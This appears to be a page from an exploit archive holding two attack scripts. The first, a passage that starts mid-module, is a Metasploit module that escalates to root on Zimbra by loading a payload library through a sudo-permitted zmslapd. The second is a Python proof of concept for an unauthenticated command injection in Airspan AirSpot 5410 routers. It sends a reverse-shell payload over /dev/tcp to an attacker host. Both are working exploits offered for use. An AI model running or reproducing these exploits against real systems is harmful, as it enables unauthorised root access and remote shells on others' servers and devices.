'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS ] } ) ) register_options [ OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]), OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]), ] register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Because this isn't patched, I can't say with 100% certainty that this will # detect a future patch (it depends on how they patch it) def check # Sanity check if is_root? fail_with(Failure::None, 'Session already has root privileges') end unless file_exist?("#{datastore['ZIMBRA_BASE']}/libexec/zmslapd") print_error("zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)") return CheckCode::Safe end unless command_exists?(datastore['SUDO_PATH']) print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)") return CheckCode::Safe end # Run `sudo -n -l` to make sure we have access to the target command cmd = "#{datastore['SUDO_PATH']} -n -l" print_status "Executing: #{cmd}" output = cmd_exec(cmd).to_s if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required') print_error('Current user could not execute sudo -l') return CheckCode::Safe end if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd") print_error('Current user does not have access to run zmslapd') return CheckCode::Safe end CheckCode::Appears end def exploit base_dir = datastore['WritableDir'].to_s unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end # Generate a random directory exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" if file_exist?(exploit_dir) fail_with(Failure::BadConfig, 'Exploit dir already exists') end # Create the directory and get ready to remove it print_status("Creating exploit directory: #{exploit_dir}") mkdir(exploit_dir) register_dir_for_cleanup(exploit_dir) # Generate some filenames library_name = ".#{rand_text_alphanumeric(5..10)}.so" library_path = "#{exploit_dir}/#{library_name}" config_name = ".#{rand_text_alphanumeric(5..10)}" config_path = "#{exploit_dir}/#{config_name}" # Create the .conf file config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n" write_file(config_path, config) write_file(library_path, generate_payload_dll) cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}" print_status "Attempting to trigger payload: #{cmd}" out = cmd_exec(cmd) unless session_created? print_error("Failed to create session! Cmd output = #{out}") end end end </code></pre>

<pre><code># -*- coding: utf-8 -*- # Exploit Title: AirSpot unauthenticated remote command injection # Date: 7/26/2022 # Exploit Author: Samy Younsi (NSLABS) (https://samy.link) # Vendor Homepage: https://www.airspan.com/ # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf # Version: 0.3.4.1-4 and under. # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu) # CVE : CVE-2022-36267 from __future__ import print_function, unicode_literals import argparse import requests import urllib3 urllib3.disable_warnings() def banner(): airspanLogo = """ ,-. / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | Airspan |__| AirSpot 5410 /||\ PWNED x_x //||\\ // || \\ __//__||__\\__ '--------------'Necrum Security Labs \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(airspanLogo)) def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}'.format(RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=30) if response.status_code != 200: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() print('[INFO] Airspan device web interface seems reachable!') except: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) try: print('[INFO] Executing reverse shell...') response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main() </code></pre>